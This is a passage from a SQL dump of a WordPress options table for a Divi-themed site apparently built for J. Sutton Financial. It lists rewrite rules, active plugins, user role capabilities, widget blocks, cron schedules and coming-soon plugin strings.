ayout&name=$matches[1]&paged=$matches[2]\";s:52:\"et_footer_layout/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?post_type=et_footer_layout&name=$matches[1]&cpage=$matches[2]\";s:41:\"et_footer_layout/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?post_type=et_footer_layout&name=$matches[1]&page=$matches[2]\";s:33:\"et_footer_layout/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"et_footer_layout/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"et_footer_layout/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_footer_layout/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"et_footer_layout/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"et_footer_layout/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:40:\"index.php?&page_id=138&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:9:{i:0;s:29:\"gravityforms/gravityforms.php\";i:1;s:19:\"akismet/akismet.php\";i:2;s:41:\"cmp-coming-soon-maintenance/niteo-cmp.php\";i:3;s:31:\"custom-css-js/custom-css-js.php\";i:4;s:34:\"gravity-forms-pdf-extended/pdf.php\";i:5;s:19:\"optimus/optimus.php\";i:6;s:53:\"supreme-modules-for-divi/supreme-modules-for-divi.php\";i:7;s:37:\"tinymce-advanced/tinymce-advanced.php\";i:8;s:23:\"wp-cerber/wp-cerber.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:4:{i:0;s:67:\"/home/corrid11/cmdev-site1.com/wp-content/themes/Divi/functions.php\";i:2;s:63:\"/home/corrid11/cmdev-site1.com/wp-content/themes/Divi/style.css\";i:3;s:69:\"/home/corrid11/cmdev-site1.com/wp-content/themes/Divi/wpml-config.xml\";i:4;s:0:\"\";}','no'),(40,'template','Divi','yes'),(41,'stylesheet','Divi','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','53496','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','0','yes'),(50,'default_link_category','0','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','0','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','1','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','0','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,'widget_categories','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(79,'uninstall_plugins','a:3:{s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";s:41:\"cmp-coming-soon-maintenance/niteo-cmp.php\";s:17:\"cmp_plugin_delete\";s:19:\"optimus/optimus.php\";a:2:{i:0;s:7:\"Optimus\";i:1;s:21:\"handle_uninstall_hook\";}}','no'),(80,'timezone_string','','yes'),(81,'page_for_posts','0','yes'),(82,'page_on_front','138','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','782','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','3','yes'),(90,'show_comments_cookies_opt_in','1','yes'),(91,'admin_email_lifespan','1693048188','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','1','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'auto_update_core_dev','enabled','yes'),(96,'auto_update_core_minor','enabled','yes'),(97,'auto_update_core_major','enabled','yes'),(98,'wp_force_deactivated_plugins','a:0:{}','yes'),(99,'initial_db_version','53496','yes'),(100,'wpfi_user_roles','a:6:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:77:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"et_support_center\";b:1;s:24:\"et_support_center_system\";b:1;s:31:\"et_support_center_remote_access\";b:1;s:31:\"et_support_center_documentation\";b:1;s:27:\"et_support_center_safe_mode\";b:1;s:22:\"et_support_center_logs\";b:1;s:15:\"edit_custom_css\";b:1;s:15:\"read_custom_css\";b:1;s:17:\"delete_custom_css\";b:1;s:16:\"edit_custom_csss\";b:1;s:23:\"edit_others_custom_csss\";b:1;s:19:\"publish_custom_csss\";b:1;s:18:\"delete_custom_csss\";b:1;s:28:\"delete_published_custom_csss\";b:1;s:25:\"delete_others_custom_csss\";b:1;s:26:\"edit_published_custom_csss\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:15:\"css_js_designer\";a:2:{s:4:\"name\";s:12:\"Web Designer\";s:12:\"capabilities\";a:10:{s:15:\"edit_custom_css\";b:1;s:15:\"read_custom_css\";b:1;s:17:\"delete_custom_css\";b:1;s:16:\"edit_custom_csss\";b:1;s:23:\"edit_others_custom_csss\";b:1;s:19:\"publish_custom_csss\";b:1;s:18:\"delete_custom_csss\";b:1;s:28:\"delete_published_custom_csss\";b:1;s:25:\"delete_others_custom_csss\";b:1;s:26:\"edit_published_custom_csss\";b:1;}}}','yes'),(101,'fresh_site','0','yes'),(102,'user_count','2','no'),(103,'widget_block','a:10:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:154:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Posts</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:227:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:150:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}i:7;a:1:{s:7:\"content\";s:90:\"<!-- wp:paragraph -->\n<p>© J. Sutton Financial, Houston, Texas</p>\n<!-- /wp:paragraph -->\";}i:8;a:1:{s:7:\"content\";s:69:\"<!-- wp:paragraph -->\n<p> | Privacy Policy</p>\n<!-- /wp:paragraph -->\";}i:9;a:1:{s:7:\"content\";s:65:\"<!-- wp:paragraph -->\n<p> | Contact Us</p>\n<!-- /wp:paragraph -->\";}i:10;a:1:{s:7:\"content\";s:64:\"<!-- wp:paragraph -->\n<p> | Subscribe</p>\n<!-- /wp:paragraph -->\";}s:12:\"_multiwidget\";i:1;}','yes'),(104,'sidebars_widgets','a:9:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";i:3;s:7:\"block-5\";i:4;s:7:\"block-6\";}s:9:\"sidebar-2\";a:1:{i:0;s:7:\"block-7\";}s:9:\"sidebar-3\";a:1:{i:0;s:7:\"block-8\";}s:9:\"sidebar-4\";a:1:{i:0;s:7:\"block-9\";}s:9:\"sidebar-5\";a:1:{i:0;s:8:\"block-10\";}s:9:\"sidebar-6\";a:0:{}s:9:\"sidebar-7\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(105,'cron','a:15:{i:1681925090;a:1:{s:18:\"cerber_bg_launcher\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:8:\"crb_five\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1681927200;a:1:{s:15:\"cerber_hourly_1\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1681927789;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1681927800;a:1:{s:15:\"cerber_hourly_2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1681930480;a:1:{s:21:\"gfpdf_cleanup_tmp_dir\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1681945788;a:4:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1681946127;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1681957200;a:1:{s:12:\"cerber_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1681988988;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1681989327;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1681989328;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1682001539;a:1:{s:17:\"gravityforms_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1682420988;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1682683410;a:1:{s:32:\"et_core_page_resource_auto_clear\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}s:7:\"version\";i:2;}','yes'),(106,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(114,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(115,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(116,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(117,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(118,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(119,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(120,'recovery_keys','a:1:{s:22:\"JjUeI3PXvOTEMBrF54Mk8F\";a:2:{s:10:\"hashed_key\";s:34:\"$P$BvhQPja1eJR8Ur2V4ube.0JVV6WQky0\";s:10:\"created_at\";i:1681919788;}}','yes'),(121,'theme_mods_twentytwentythree','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1677499409;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}}','yes'),(18067,'_transient_GFCache_c5d862863410c6620f957e68184cd337','a:1:{s:17:\"gravityforms_cron\";a:3:{i:0;i:1681915238;i:1;i:1681828977;i:2;i:1681744919;}}','yes'),(12550,'niteoCS_status','0','yes'),(12551,'niteoCS_text_logo','Coming Soon','yes'),(12552,'niteoCS_title','J. Sutton Financial','yes'),(12553,'niteoCS_translation','[{\"id\":0,\"name\":\"Counter Seconds Label\",\"string\":\"Seconds\",\"translation\":\"Seconds\"},{\"id\":1,\"name\":\"Counter Minutes Label\",\"string\":\"Minutes\",\"translation\":\"Minutes\"},{\"id\":2,\"name\":\"Counter Hours Label\",\"string\":\"Hours\",\"translation\":\"Hours\"},{\"id\":3,\"name\":\"Counter Days Label\",\"string\":\"Days\",\"translation\":\"Days\"},{\"id\":4,\"name\":\"Subscribe Form Placeholder\",\"string\":\"Insert your email address.\",\"translation\":\"Insert your email address.\"},{\"id\":5,\"name\":\"Subscribe Response Duplicate\",\"string\":\"Oops! This email address is already on our list.\",\"translation\":\"Oops! This email address is already on our list.\"},{\"id\":6,\"name\":\"Subscribe Response Not Valid\",\"string\":\"Oops! We need a valid email address. Please try again.\",\"translation\":\"Oops! We need a valid email address. Please try again.\"},{\"id\":7,\"name\":\"Subscribe Response Thanks\",\"string\":\"Thank you! Your sign up request was successful.\",\"translation\":\"Thank you! Your sign up request was successful.\"},{\"id\":8,\"name\":\"Subscribe Submit Button Label\",\"string\":\"Submit\",\"translation\":\"Submit\"},{\"id\":9,\"name\":\"CMP Eclipse Theme: Scroll Text\",\"string\":\"Scroll\",\"translation\":\"Scroll\"},{\"id\":10,\"name\":\"Subscribe Form First Name Placeholder\",\"string\":\"First Name\",\"translation\":\"First Name\"},{\"id\":11,\"name\":\"Subscribe Form Last Name Placeholder\",\"string\":\"Last Name\",\"translation\":\"Last Name\"},{\"id\":12,\"name\":\"Subscribe\",\"string\":\"Subscribe\",\"translation\":\"Subscribe\"},{\"id\":13,\"name\":\"Subscribe GDPR Checkbox\",\"string\":\"You 